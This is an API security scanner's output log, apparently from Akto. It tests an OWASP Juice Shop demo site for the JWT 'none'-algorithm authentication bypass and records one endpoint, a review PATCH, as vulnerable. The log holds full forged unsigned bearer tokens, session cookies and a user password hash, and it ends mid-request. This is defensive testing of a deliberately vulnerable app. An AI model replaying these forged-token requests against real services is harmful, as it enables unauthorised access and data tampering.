output.txt

Api collection: 1689063104 juice_shop_demo

API: https://juiceshop.akto.io/rest/products/reviews PATCH
Test: NO_AUTH JWT_NONE_ALGO Vulnerable: true
Original request : {"Origin":"https://juiceshop.akto.io","Cookie":"language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=v7BmaPZbQ7NroLqvm1YzMVnwOBAVkTefndgpE5jkJlXey43R68K2D9xWNQgq; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MjEsInVzZXJuYW1lIjoidmljdGltIiwiZW1haWwiOiJ2aWN0aW1AZ21haWwuY29tIiwicGFzc3dvcmQiOiJhNjJlN2JlMGE1NjQwODFiNmE5Zjc1MzA4MjA4YzQzMyIsInJvbGUiOiJjdXN0b21lciIsImRlbHV4ZVRva2VuIjoiIiwibGFzdExvZ2luSXAiOiIiLCJwcm9maWxlSW1hZ2UiOiJhc3NldHMvcHVibGljL2ltYWdlcy91cGxvYWRzL2RlZmF1bHQuc3ZnIiwidG90cFNlY3JldCI6IiIsImlzQWN0aXZlIjp0cnVlLCJjcmVhdGVkQXQiOiIyMDIzLTAzLTA5IDE0OjQ2OjI5LjI2OSArMDA6MDAiLCJ1cGRhdGVkQXQiOiIyMDIzLTAzLTA5IDE0OjQ2OjI5LjI2OSArMDA6MDAiLCJkZWxldGVkQXQiOm51bGx9LCJpYXQiOjE2NzgzNzM0MzAsImV4cCI6MTY3ODM5MTQzMH0.JYBu5fv--c9xic_A3yLhvcy2p5o6YjvsVSDnDJ8f5x5cFq5MBfm-Q3a9PrkzFk37QI9nkAsCHXp7lOOdI72sUjHyqZiBu3PT7XzOQmkf8G3D0QZn51oX-bzCEDKbprFoBi5a14duxQvuGhHakoK1La9x8Dgz0SQikeAEsDH6xzo","Accept":"application/json, text/plain, */*","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36","Referer":"https://juiceshop.akto.io/","Connection":"close","Sec-Fetch-Site":"same-origin","Sec-Fetch-Dest":"empty","Host":"juiceshop.akto.io","Accept-Encoding":"gzip, deflate","Sec-Fetch-Mode":"cors","Authorization":"Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MjEsInVzZXJuYW1lIjoidmljdGltIiwiZW1haWwiOiJ2aWN0aW1AZ21haWwuY29tIiwicGFzc3dvcmQiOiJhNjJlN2JlMGE1NjQwODFiNmE5Zjc1MzA4MjA4YzQzMyIsInJvbGUiOiJjdXN0b21lciIsImRlbHV4ZVRva2VuIjoiIiwibGFzdExvZ2luSXAiOiIiLCJwcm9maWxlSW1hZ2UiOiJhc3NldHMvcHVibGljL2ltYWdlcy91cGxvYWRzL2RlZmF1bHQuc3ZnIiwidG90cFNlY3JldCI6IiIsImlzQWN0aXZlIjp0cnVlLCJjcmVhdGVkQXQiOiIyMDIzLTAzLTEwIDA1OjM5OjE4LjI5OSArMDA6MDAiLCJ1cGRhdGVkQXQiOiIyMDIzLTAzLTEwIDA1OjM5OjE4LjI5OSArMDA6MDAiLCJkZWxldGVkQXQiOm51bGx9LCJpYXQiOjE2Nzg0MjY4NjUsImV4cCI6MTk5Mzc4Njg2NX0.bUvn24at2rOcuht5hto8QHl7pXdanuLKQDBxqH2MWG2-mMEI8LgWm1R9HhUD209dHL93Ks52KijKJFOlF_5Z3-v47jY-Rf73wcA_Le69-n7EudWwrc_X6EGpNiqovVYm31RZQnU2Q_H-PtzpnzNIOnfE6z_p023acrke-cZkKss","sec-ch-ua":"\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"macOS\"","Accept-Language":"en-GB,en-US;q=0.9,en;q=0.8","Content-Length":"48","Content-Type":"application/json"}
{"id":"Q9ETXE3j6YApqTkyq","message":"Bad apple"}
Original response: {"X-Frame-Options":"SAMEORIGIN","X-Recruiting":"/#/jobs","Access-Control-Allow-Origin":"*","ETag":"W/\"11a-wFugoEQ0LqvlHgq2VF+QBdLu144\"","X-Content-Type-Options":"nosniff","Connection":"close","Feature-Policy":"payment 'self'","Vary":"Accept-Encoding","Content-Length":"282","Date":"Thu, 09 Mar 2023 14:50:46 GMT","Content-Type":"application/json; charset=utf-8"}
{"modified":1,"original":[{"message":"Best thing ever!","author":"victim@gmail.com","product":1,"likesCount":0,"likedBy":[],"_id":"Q9ETXE3j6YApqTkyq"}],"updated":[{"message":"Bad apple","author":"victim@gmail.com","product":1,"likesCount":0,"likedBy":[],"_id":"Q9ETXE3j6YApqTkyq"}]}

Attempted request : {url=https://juiceshop.akto.io/rest/products/reviews, method=PATCH, type=HTTP/1.1, queryParams=null, body={"id":"Q9ETXE3j6YApqTkyq","message":"Bad apple"}, headers={"sec-fetch-mode":"cors","content-length":"48","sec-fetch-site":"same-origin","cookie":"language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=v7BmaPZbQ7NroLqvm1YzMVnwOBAVkTefndgpE5jkJlXey43R68K2D9xWNQgq; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MjEsInVzZXJuYW1lIjoidmljdGltIiwiZW1haWwiOiJ2aWN0aW1AZ21haWwuY29tIiwicGFzc3dvcmQiOiJhNjJlN2JlMGE1NjQwODFiNmE5Zjc1MzA4MjA4YzQzMyIsInJvbGUiOiJjdXN0b21lciIsImRlbHV4ZVRva2VuIjoiIiwibGFzdExvZ2luSXAiOiIiLCJwcm9maWxlSW1hZ2UiOiJhc3NldHMvcHVibGljL2ltYWdlcy91cGxvYWRzL2RlZmF1bHQuc3ZnIiwidG90cFNlY3JldCI6IiIsImlzQWN0aXZlIjp0cnVlLCJjcmVhdGVkQXQiOiIyMDIzLTAzLTA5IDE0OjQ2OjI5LjI2OSArMDA6MDAiLCJ1cGRhdGVkQXQiOiIyMDIzLTAzLTA5IDE0OjQ2OjI5LjI2OSArMDA6MDAiLCJkZWxldGVkQXQiOm51bGx9LCJpYXQiOjE2NzgzNzM0MzAsImV4cCI6MTY3ODM5MTQzMH0.JYBu5fv--c9xic_A3yLhvcy2p5o6YjvsVSDnDJ8f5x5cFq5MBfm-Q3a9PrkzFk37QI9nkAsCHXp7lOOdI72sUjHyqZiBu3PT7XzOQmkf8G3D0QZn51oX-bzCEDKbprFoBi5a14duxQvuGhHakoK1La9x8Dgz0SQikeAEsDH6xzo","accept-language":"en-GB,en-US;q=0.9,en;q=0.8","origin":"https://juiceshop.akto.io","x-akto-ignore":"0","accept":"application/json, text/plain, */*","authorization":"Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MjEsInVzZXJuYW1lIjoidmljdGltIiwiZW1haWwiOiJ2aWN0aW1AZ21haWwuY29tIiwicGFzc3dvcmQiOiJhNjJlN2JlMGE1NjQwODFiNmE5Zjc1MzA4MjA4YzQzMyIsInJvbGUiOiJjdXN0b21lciIsImRlbHV4ZVRva2VuIjoiIiwibGFzdExvZ2luSXAiOiIiLCJwcm9maWxlSW1hZ2UiOiJhc3NldHMvcHVibGljL2ltYWdlcy91cGxvYWRzL2RlZmF1bHQuc3ZnIiwidG90cFNlY3JldCI6IiIsImlzQWN0aXZlIjp0cnVlLCJjcmVhdGVkQXQiOiIyMDIzLTAzLTEwIDA1OjM5OjE4LjI5OSArMDA6MDAiLCJ1cGRhdGVkQXQiOiIyMDIzLTAzLTEwIDA1OjM5OjE4LjI5OSArMDA6MDAiLCJkZWxldGVkQXQiOm51bGx9LCJpYXQiOjE2Nzg0MjY4NjUsImV4cCI6MTk5Mzc4Njg2NX0.","sec-ch-ua":"\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"macOS\"","host":"juiceshop.akto.io","connection":"close","content-type":"application/json","accept-encoding":"gzip, deflate","user-agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36","sec-fetch-dest":"empty"}}

Attempted response: {statusCode=200.0, body={"modified":1,"original":[{"_id":"Q9ETXE3j6YApqTkyq","message":"Bad apple","author":"victim@gmail.com","product":1,"likesCount":0,"likedBy":[]}],"updated":[{"_id":"Q9ETXE3j6YApqTkyq","message":"Bad apple","author":"victim@gmail.com","product":1,"likesCount":0,"likedBy":[]}]}, headers={"date":"Fri, 29 Sep 2023 08:58:26 GMT","access-control-allow-origin":"*","content-length":"275","x-content-type-options":"nosniff","x-recruiting":"/#/jobs","vary":"Accept-Encoding","x-frame-options":"SAMEORIGIN","content-type":"application/json; charset=utf-8","etag":"W/\"113-LsYk5hInHrGt2Lkrbfy5tE6d6Ps\"","feature-policy":"payment 'self'"}}


 ------------------------------------ 

API: https://juiceshop.akto.io/ GET
Test: NO_AUTH JWT_NONE_ALGO Vulnerable: false
Original request : {"Cookie":"language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=v7BmaPZbQ7NroLqvm1YzMVnwOBAVkTefndgpE5jkJlXey43R68K2D9xWNQgq","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36","Connection":"close","Sec-Fetch-Site":"none","Sec-Fetch-Dest":"document","Host":"juiceshop.akto.io","Accept-Encoding":"gzip, deflate","Sec-Fetch-Mode":"navigate","sec-ch-ua":"\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"","sec-ch-ua-mobile":"?0","Upgrade-Insecure-Requests":"1","sec-ch-ua-platform":"\"macOS\"","Sec-Fetch-User":"?1","Accept-Language":"en-GB,en-US;q=0.9,en;q=0.8"}

Original response: {"Access-Control-Allow-Origin":"*","X-Content-Type-Options":"nosniff","Connection":"close","Last-Modified":"Thu, 09 Mar 2023 14:46:29 GMT","Date":"Thu, 09 Mar 2023 14:48:39 GMT","X-Frame-Options":"SAMEORIGIN","Accept-Ranges":"bytes","X-Recruiting":"/#/jobs","Cache-Control":"public, max-age=0","ETag":"W/\"7c3-186c6d67748\"","Feature-Policy":"payment 'self'","Vary":"Accept-Encoding","Content-Length":"1987","Content-Type":"text/html; charset=UTF-8"}
<!--
  ~ Copyright (c) 2014-2023 Bjoern Kimminich & the OWASP Juice Shop contributors.
  ~ SPDX-License-Identifier: MIT
  --><!DOCTYPE html><html lang="en"><head>
  <meta charset="utf-8">
  <title>OWASP Juice Shop</title>
  <meta name="description" content="Probably the most modern and sophisticated insecure web application">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link id="favicon" rel="icon" type="image/x-icon" href="assets/public/favicon_js.ico">
  <link rel="stylesheet" type="text/css" href="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.css">
  <script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
  <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
  <script>
    window.addEventListener("load", function(){
      window.cookieconsent.initialise({
        "palette": {
          "popup": { "background": "#546e7a", "text": "#ffffff" },
          "button": { "background": "#558b2f", "text": "#ffffff" }
        },
        "theme": "classic",
        "position": "bottom-right",
        "content": { "message": "This website uses fruit cookies to ensure you get the juiciest tracking experience.", "dismiss": "Me want it!", "link": "But me wait!", "href": "https://www.youtube.com/watch?v=9PnbKL3wuH4" }
      })});
  </script>
<style>.bluegrey-lightgreen-theme.mat-app-background{background-color:#303030;color:#fff}@charset "UTF-8";@media screen and (-webkit-min-device-pixel-ratio:0){}</style><link rel="stylesheet" href="styles.css" media="print" onload="this.media='all'"><noscript><link rel="stylesheet" href="styles.css"></noscript></head>
<body class="mat-app-background bluegrey-lightgreen-theme">
  <app-root></app-root>
<script src="runtime.js" type="module"></script><script src="polyfills.js" type="module"></script><script src="vendor.js" type="module"></script><script src="main.js" type="module"></script>

</body></html>
Attempted errors : 
Error 1: Request API failed to satisfy api_selection_filters block, skipping execution


 ------------------------------------ 

API: https://juiceshop.akto.io/api/Cards GET
Test: NO_AUTH JWT_NONE_ALGO Vulnerable: false
Original request : {"Cookie":"language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=v7BmaPZbQ7NroLqvm1YzMVnwOBAVkTefndgpE5jkJlXey43R68K2D9xWNQgq; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MjEsInVzZXJuYW1lIjoidmljdGltIiwiZW1haWwiOiJ2aWN0aW1AZ21haWwuY29tIiwicGFzc3dvcmQiOiJhNjJlN2JlMGE1NjQwODFiNmE5Zjc1MzA4MjA4YzQzMyIsInJvbGUiOiJjdXN0b21lciIsImRlbHV4ZVRva2VuIjoiIiwibGFzdExvZ2luSXAiOiIiLCJwcm9maWxlSW1hZ2UiOiJhc3NldHMvcHVibGljL2ltYWdlcy91cGxvYWRzL2RlZmF1bHQuc3ZnIiwidG90cFNlY3JldCI6IiIsImlzQWN0aXZlIjp0cnVlLCJjcmVhdGVkQXQiOiIyMDIzLTAzLTA5IDE0OjQ2OjI5LjI2OSArMDA6MDAiLCJ1cGRhdGVkQXQiOiIyMDIzLTAzLTA5IDE0OjQ2OjI5LjI2OSArMDA6MDAiLCJkZWxldGVkQXQiOm51bGx9LCJpYXQiOjE2NzgzNzM0MzAsImV4cCI6MTY3ODM5MTQzMH0.JYBu5fv--c9xic_A3yLhvcy2p5o6YjvsVSDnDJ8f5x5cFq5MBfm-Q3a9PrkzFk37QI9nkAsCHXp7lOOdI72sUjHyqZiBu3PT7XzOQmkf8G3D0QZn51oX-bzCEDKbprFoBi5a14duxQvuGhHakoK1La9x8Dgz0SQikeAEsDH6xzo","Accept":"application/json, text/plain, */*","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36","Referer":"https://juiceshop.akto.io/","Connection":"close","Sec-Fetch-Site":"same-origin","Sec-Fetch-Dest":"empty","Host":"juiceshop.akto.io","Accept-Encoding":"gzip, deflate","Sec-Fetch-Mode":"cors","Authorization":"Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MjEsInVzZXJuYW1lIjoidmljdGltIiwiZW1haWwiOiJ2aWN0aW1AZ21haWwuY29tIiwicGFzc3dvcmQiOiJhNjJlN2JlMGE1NjQwODFiNmE5Zjc1MzA4MjA4YzQzMyIsInJvbGUiOiJjdXN0b21lciIsImRlbHV4ZVRva2VuIjoiIiwibGFzdExvZ2luSXAiOiIiLCJwcm9maWxlSW1hZ2UiOiJhc3NldHMvcHVibGljL2ltYWdlcy91cGxvYWRzL2RlZmF1bHQuc3ZnIiwidG90cFNlY3JldCI6IiIsImlzQWN0aXZlIjp0cnVlLCJjcmVhdGVkQXQiOiIyMDIzLTAzLTEwIDA1OjM5OjE4LjI5OSArMDA6MDAiLCJ1cGRhdGVkQXQiOiIyMDIzLTAzLTEwIDA1OjM5OjE4LjI5OSArMDA6MDAiLCJkZWxldGVkQXQiOm51bGx9LCJpYXQiOjE2Nzg0MjY4NjUsImV4cCI6MTk5Mzc4Njg2NX0.bUvn24at2rOcuht5hto8QHl7pXdanuLKQDBxqH2MWG2-mMEI8LgWm1R9HhUD209dHL93Ks52KijKJFOlF_5Z3-v47jY-Rf73wcA_Le69-n7EudWwrc_X6EGpNiqovVYm31RZQnU2Q_H-PtzpnzNIOnfE6z_p023acrke-cZkKss","sec-ch-ua":"\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"macOS\"","Accept-Language":"en-GB,en-US;q=0.9,en;q=0.8"}

Original response: {"X-Frame-Options":"SAMEORIGIN","X-Recruiting":"/#/jobs","Access-Control-Allow-Origin":"*","ETag":"W/\"89-SBgYQrlZNItdhh51fhg39LT9OzY\"","X-Content-Type-Options":"nosniff","Connection":"close","Feature-Policy":"payment 'self'","Vary":"Accept-Encoding","Content-Length":"137","Date":"Thu, 09 Mar 2023 14:51:23 GMT","Content-Type":"application/json; charset=utf-8"}
{"status":"success","data":[{"UserId":21,"id":2,"fullName":"Innocent victim","cardNum":"************1111","expMonth":12,"expYear":2092}]}

Attempted request : {url=https://juiceshop.akto.io/api/Cards, method=GET, type=HTTP/1.1, queryParams=null, body=, headers={"sec-fetch-mode":"cors","sec-fetch-site":"same-origin","cookie":"language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=v7BmaPZbQ7NroLqvm1YzMVnwOBAVkTefndgpE5jkJlXey43R68K2D9xWNQgq; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MjEsInVzZXJuYW1lIjoidmljdGltIiwiZW1haWwiOiJ2aWN0aW1AZ21haWwuY29tIiwicGFzc3dvcmQiOiJhNjJlN2JlMGE1NjQwODFiNmE5Zjc1MzA4MjA4YzQzMyIsInJvbGUiOiJjdXN0b21lciIsImRlbHV4ZVRva2VuIjoiIiwibGFzdExvZ2luSXAiOiIiLCJwcm9maWxlSW1hZ2UiOiJhc3NldHMvcHVibGljL2ltYWdlcy91cGxvYWRzL2RlZmF1bHQuc3ZnIiwidG90cFNlY3JldCI6IiIsImlzQWN0aXZlIjp0cnVlLCJjcmVhdGVkQXQiOiIyMDIzLTAzLTA5IDE0OjQ2OjI5LjI2OSArMDA6MDAiLCJ1cGRhdGVkQXQiOiIyMDIzLTAzLTA5IDE0OjQ2OjI5LjI2OSArMDA6MDAiLCJkZWxldGVkQXQiOm51bGx9LCJpYXQiOjE2NzgzNzM0MzAsImV4cCI6MTY3ODM5MTQzMH0.JYBu5fv--c9xic_A3yLhvcy2p5o6YjvsVSDnDJ8f5x5cFq5MBfm-Q3a9PrkzFk37QI9nkAsCHXp7lOOdI72sUjHyqZiBu3PT7XzOQmkf8G3D0QZn51oX-bzCEDKbprFoBi5a14duxQvuGhHakoK1La9x8Dgz0SQikeAEsDH6xzo","accept-language":"en-GB,en-US;q=0.9,en;q=0.8","x-akto-ignore":"0","accept":"application/json, text/plain, */*","authorization":"Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MjEsInVzZXJuYW1lIjoidmljdGltIiwiZW1haWwiOiJ2aWN0aW1AZ21haWwuY29tIiwicGFzc3dvcmQiOiJhNjJlN2JlMGE1NjQwODFiNmE5Zjc1MzA4MjA4YzQzMyIsInJvbGUiOiJjdXN0b21lciIsImRlbHV4ZVRva2VuIjoiIiwibGFzdExvZ2luSXAiOiIiLCJwcm9maWxlSW1hZ2UiOiJhc3NldHMvcHVibGljL2ltYWdlcy91cGxvYWRzL2RlZmF1bHQuc3ZnIiwidG90cFNlY3JldCI6IiIsImlzQWN0aXZlIjp0cnVlLCJjcmVhdGVkQXQiOiIyMDIzLTAzLTEwIDA1OjM5OjE4LjI5OSArMDA6MDAiLCJ1cGRhdGVkQXQiOiIyMDIzLTAzLTEwIDA1OjM5OjE4LjI5OSArMDA6MDAiLCJkZWxldGVkQXQiOm51bGx9LCJpYXQiOjE2Nzg0MjY4NjUsImV4cCI6MTk5Mzc4Njg2NX0.","sec-ch-ua":"\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"macOS\"","host":"juiceshop.akto.io","connection":"close","accept-encoding":"gzip, deflate","user-agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36","sec-fetch-dest":"empty"}}

Attempted response: {statusCode=401.0, body={"status":"error","message":{}}, headers={"date":"Fri, 29 Sep 2023 08:58:25 GMT","access-control-allow-origin":"*","content-length":"31","x-content-type-options":"nosniff","x-recruiting":"/#/jobs","vary":"Accept-Encoding","x-frame-options":"SAMEORIGIN","content-type":"application/json; charset=utf-8","etag":"W/\"1f-Sc96etNbljMus8t9iaktsJ/FpRk\"","feature-policy":"payment 'self'"}}


 ------------------------------------ 

API: https://juiceshop.akto.io/api/Challenges/ GET
Test: NO_AUTH JWT_NONE_ALGO Vulnerable: false
Original request : {"Cookie":"language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=v7BmaPZbQ7NroLqvm1YzMVnwOBAVkTefndgpE5jkJlXey43R68K2D9xWNQgq","Accept":"application/json, text/plain, */*","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36","Referer":"https://juiceshop.akto.io/","Connection":"close","Sec-Fetch-Site":"same-origin","Sec-Fetch-Dest":"empty","Host":"juiceshop.akto.io","Accept-Encoding":"gzip, deflate","Sec-Fetch-Mode":"cors","sec-ch-ua":"\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"macOS\"","Accept-Language":"en-GB,en-US;q=0.9,en;q=0.8"}

Original response: {"X-Frame-Options":"SAMEORIGIN","X-Recruiting":"/#/jobs","Access-Control-Allow-Origin":"*","ETag":"W/\"270-TLpQRrZ3aLAzt1bM+TdVQ5Rl+ms\"","X-Content-Type-Options":"nosniff","Connection":"close","Feature-Policy":"payment 'self'","Vary":"Accept-Encoding","Content-Length":"624","Date":"Thu, 09 Mar 2023 14:48:39 GMT","Content-Type":"application/json; charset=utf-8"}
{"status":"success","data":[{"id":69,"key":"scoreBoardChallenge","name":"Score Board","category":"Miscellaneous","tags":"Tutorial,Code Analysis","description":"Find the carefully hidden 'Score Board' page.","difficulty":1,"hint":"Try to find a reference or clue behind the scenes. Or simply guess what URL the Score Board might have.","hintUrl":"https://pwning.owasp-juice.shop/part2/score-board.html#find-the-carefully-hidden-score-board-page","mitigationUrl":null,"solved":false,"disabledEnv":null,"tutorialOrder":1,"codingChallengeStatus":0,"createdAt":"2023-03-09T14:46:29.307Z","updatedAt":"2023-03-09T14:46:29.307Z"}]}
Attempted errors : 
Error 1: Request API failed to satisfy api_selection_filters block, skipping execution


 ------------------------------------ 

API: https://juiceshop.akto.io/api/Feedbacks/ POST
Test: NO_AUTH JWT_NONE_ALGO Vulnerable: false
Original request : {"Origin":"https://juiceshop.akto.io","Cookie":"language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=v7BmaPZbQ7NroLqvm1YzMVnwOBAVkTefndgpE5jkJlXey43R68K2D9xWNQgq; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MjEsInVzZXJuYW1lIjoidmljdGltIiwiZW1haWwiOiJ2aWN0aW1AZ21haWwuY29tIiwicGFzc3dvcmQiOiJhNjJlN2JlMGE1NjQwODFiNmE5Zjc1MzA4MjA4YzQzMyIsInJvbGUiOiJjdXN0b21lciIsImRlbHV4ZVRva2VuIjoiIiwibGFzdExvZ2luSXAiOiIiLCJwcm9maWxlSW1hZ2UiOiJhc3NldHMvcHVibGljL2ltYWdlcy91cGxvYWRzL2RlZmF1bHQuc3ZnIiwidG90cFNlY3JldCI6IiIsImlzQWN0aXZlIjp0cnVlLCJjcmVhdGVkQXQiOiIyMDIzLTAzLTA5IDE0OjQ2OjI5LjI2OSArMDA6MDAiLCJ1cGRhdGVkQXQiOiIyMDIzLTAzLTA5IDE0OjQ2OjI5LjI2OSArMDA6MDAiLCJkZWxldGVkQXQiOm51bGx9LCJpYXQiOjE2NzgzNzM0MzAsImV4cCI6MTY3ODM5MTQzMH0.JYBu5fv--c9xic_A3yLhvcy2p5o6YjvsVSDnDJ8f5x5cFq5MBfm-Q3a9PrkzFk37QI9nkAsCHXp7lOOdI72sUjHyqZiBu3PT7XzOQmkf8G3D0QZn51oX-bzCEDKbprFoBi5a14duxQvuGhHakoK1La9x8Dgz0SQikeAEsDH6xzo","Accept":"application/json, text/plain, */*","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36","Referer":"https://juiceshop.akto.io/","Connection":"close","Sec-Fetch-Site":"same-origin","Sec-Fetch-Dest":"empty","Host":"juiceshop.akto.io","Accept-Encoding":"gzip, deflate","Sec-Fetch-Mode":"cors","Authorization":"Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MjEsInVzZXJuYW1lIjoidmljdGltIiwiZW1haWwiOiJ2aWN0aW1AZ21haWwuY29tIiwicGFzc3dvcmQiOiJhNjJlN2JlMGE1NjQwODFiNmE5Zjc1MzA4MjA4YzQzMyIsInJvbGUiOiJjdXN0b21lciIsImRlbHV4ZVRva2VuIjoiIiwibGFzdExvZ2luSXAiOiIiLCJwcm9maWxlSW1hZ2UiOiJhc3NldHMvcHVibGljL2ltYWdlcy91cGxvYWRzL2RlZmF1bHQuc3ZnIiwidG90cFNlY3JldCI6IiIsImlzQWN0aXZlIjp0cnVlLCJjcmVhdGVkQXQiOiIyMDIzLTAzLTEwIDA1OjM5OjE4LjI5OSArMDA6MDAiLCJ1cGRhdGVkQXQiOiIyMDIzLTAzLTEwIDA1OjM5OjE4LjI5OSArMDA6MDAiLCJkZWxldGVkQXQiOm51bGx9LCJpYXQiOjE2Nzg0MjY4NjUsImV4cCI6MTk5Mzc4Njg2NX0.bUvn24at2rOcuht5hto8QHl7pXdanuLKQDBxqH2MWG2-mMEI8LgWm1R9HhUD209dHL93Ks52KijKJFOlF_5Z3-v47jY-Rf73wcA_Le69-n7EudWwrc_X6EGpNiqovVYm31RZQnU2Q_H-PtzpnzNIOnfE6z_p023acrke-cZkKss","sec-ch-ua":"\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"macOS\"","Accept-Language":"en-GB,en-US;q=0.9,en;q=0.8","Content-Length":"94","Content-Type":"application/json"}
{"UserId":21,"captchaId":0,"captcha":"-80","comment":"good app (***tim@gmail.com)","rating":2}
Original response: {"X-Frame-Options":"SAMEORIGIN","X-Recruiting":"/#/jobs","Access-Control-Allow-Origin":"*","ETag":"W/\"b1-RGj+iA65qS7kTluS9ShY0SpRW6U\"","X-Content-Type-Options":"nosniff","Connection":"close","Feature-Policy":"payment 'self'","Vary":"Accept-Encoding","Content-Length":"177","Date":"Thu, 09 Mar 2023 14:51:13 GMT","Location":"/api/Feedbacks/8","Content-Type":"application/json; charset=utf-8"}
{"status":"success","data":{"id":8,"UserId":21,"comment":"good app (***tim@gmail.com)","rating":2,"updatedAt":"2023-03-09T14:51:13.965Z","createdAt":"2023-03-09T14:51:13.965Z"}}

Attempted request : {url=https://juiceshop.akto.io/api/Feedbacks/, method=POST, type=HTTP/1.1, queryParams=null, body={"UserId":21,"captchaId":0,"captcha":"-80","comment":"good app (***tim@gmail.com)","rating":2}, headers={"sec-fetch-mode":"cors","content-length":"94","sec-fetch-site":"same-origin","cookie":"language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=v7BmaPZbQ7NroLqvm1YzMVnwOBAVkTefndgpE5jkJlXey43R68K2D9xWNQgq; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MjEsInVzZXJuYW1lIjoidmljdGltIiwiZW1haWwiOiJ2aWN0aW1AZ21haWwuY29tIiwicGFzc3dvcmQiOiJhNjJlN2JlMGE1NjQwODFiNmE5Zjc1MzA4MjA4YzQzMyIsInJvbGUiOiJjdXN0b21lciIsImRlbHV4ZVRva2VuIjoiIiwibGFzdExvZ2luSXAiOiIiLCJwcm9maWxlSW1hZ2UiOiJhc3NldHMvcHVibGljL2ltYWdlcy91cGxvYWRzL2RlZmF1bHQuc3ZnIiwidG90cFNlY3JldCI6IiIsImlzQWN0aXZlIjp0cnVlLCJjcmVhdGVkQXQiOiIyMDIzLTAzLTA5IDE0OjQ2OjI5LjI2OSArMDA6MDAiLCJ1cGRhdGVkQXQiOiIyMDIzLTAzLTA5IDE0OjQ2OjI5LjI2OSArMDA6MDAiLCJkZWxldGVkQXQiOm51bGx9LCJpYXQiOjE2NzgzNzM0MzAsImV4cCI6MTY3ODM5MTQzMH0.JYBu5fv--c9xic_A3yLhvcy2p5o6YjvsVSDnDJ8f5x5cFq5MBfm-Q3a9PrkzFk37QI9nkAsCHXp7lOOdI72sUjHyqZiBu3PT7XzOQmkf8G3D0QZn51oX-bzCEDKbprFoBi5a14duxQvuGhHakoK1La9x8Dgz0SQikeAEsDH6xzo","accept-language":"en-GB,en-US;q=0.9,en;q=0.8","origin":"https://juiceshop.akto.io","x-akto-ignore":"0","accept":"application/j